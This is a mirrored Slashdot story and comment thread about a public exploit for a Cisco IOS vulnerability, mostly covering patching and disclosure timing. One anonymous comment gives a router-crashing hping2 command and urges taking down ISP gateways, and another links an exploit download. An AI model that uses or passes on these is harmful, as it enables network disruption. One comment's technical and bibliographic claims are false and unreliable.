Slashdot Mirror


Exploit Available for Cisco IOS Vulnerability

GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, now has a published exploit available, as reported recently by CERT. While there are some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit script kiddies could start creating havoc? jerw134 wanted to start a pool to find out when the exploit would be publicly available; here's the answer."

13 of 277 comments

  1. Great... by mfifer · · Score: 4, Interesting

    ...the 'sploit is more easily available than the fix!

    Anyone else gone through hell today trying to get the patch from Cisco?

    Grrr... >-/

    1. Re:Great... by silas_moeckel · · Score: 2, Interesting

      Well, I haven't had any issues; just go log in to your CCO account and grab the new IOS's. Actually, my local mirror updated yesterday automatically. As for going through TAC, that's always a PITA, to say a couple hundred dollars a year.

      --
      No sir I don't like it.
  2. Exploits et al., by Jack+Wagner · · Score: 0, Interesting

    This is something that is such a black plague on the IT industry and it just amazes me that we're supposed to take it in stride. The problem here is that we continue to use tools that are not mature.

    During these difficult economic times I've had to branch out and do some "web programming" along with my real programming contract work (mostly low level 4Q multi-threaded kernel hacking, etc.) and after doing some cursory studying and testing of various techniques I'm amazed at how badly most of the sites on the web are designed and how most of them use the wrong tool for the job.

    For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only, as they load on an average of Olog(n) faster than color graphics (where n is the number of pixels in the color graphic) thusly improving their UHCRF (unique hit customer retention factor) ratio by 35%!! I won't brag about the $10,000 bonus check I received from hitting that benchmark... heh. Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.

    It's a shame we don't teach IT people to spend some time to learn their trade inside and out instead of always forcing them to jump on the "flavour of the month" and use abstracted high level tools. As Leon Brooks sums it up in his famous book "The Mythical Man Month" - You'll never properly solve a programming problem by using tools that are not mature. Leon hits the nail right on the head with that one.

    Warmest regards,
    --Jack

    --
    Wagner LLC Consulting Co. - Getting it right the first time
    1. Re:Exploits et al., by Burlynerd · · Score: 5, Interesting

      You're right on the money with the "maturity" comments, Jack. The way technology has been running, we have been in a constant state of trying to learn something new. We've never really had a chance to get "really good" at some of our technologies, before the next version or replacement technology arrived.

      The Cisco situation is not due to bleeding edge issues though. They should have found this problem sooner.

    2. Re:Exploits et al., by gabriel-dialupusa · · Score: 2, Interesting

      It's also a shame we have to pat ourselves on the back a lot on slashdot. And as long as you're not bragging about $10k bonuses, make sure to not tell us how you didn't spend it on the EFF and FSF. ;-)

      --
      Beware he who would deny you access to information,
      for in his heart he dreams himself your master.
    3. Re:Exploits et al., by aliens · · Score: 2, Interesting

      What kind of graphics were these? They should have been already optimized to allow for quick loading.

      Unless you're talking about high quality TIFs, B&W vs. color should not be making a difference in your load times.

      --
      -- taking over the world, we are.
  3. tried it... works quite well by Anonymous Coward · · Score: 2, Interesting

    I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h

    -orbit0r

  4. Is this a problem of feature inflation? by CraigV · · Score: 3, Interesting

    I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?

  5. Wanna check your routers? by zdzichu · · Score: 2, Interesting

    Here's the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.t ar
    It's a .tar.gz file, incorrectly named.

    --
    :wq
  6. Easy way to do it.. by Anonymous Coward · · Score: 1, Interesting

    Here's how to take a router down:

    Assuming you're using debian.

    apt-get install hping2

    ping

    Subtract x in ttl=x from 255

    then run:

    hping2 -t -H 55 -d 128 -E /dev/urandom

    enjoy...

    and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.

  7. Just how long has Cisco known about this? by riaasucks · · Score: 2, Interesting

    If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?

  8. Re:The code by njchick · · Score: 2, Interesting

    Why does the author put "(void)" before every fprintf()? Can it be some kind of hidden signature?

  9. Re:Contact your network company by Artifex · · Score: 2, Interesting

    After which they'll explain that they use Juniper equipment because it doesn't suck near as much as Cisco and you'll look like an ass

    They may use Juniper routers, but if your contract with them includes their maintenance of CPE they provided for you, and the CPE is Cisco, you're still screwed, aren't you?

    --
    Get off my launchpad!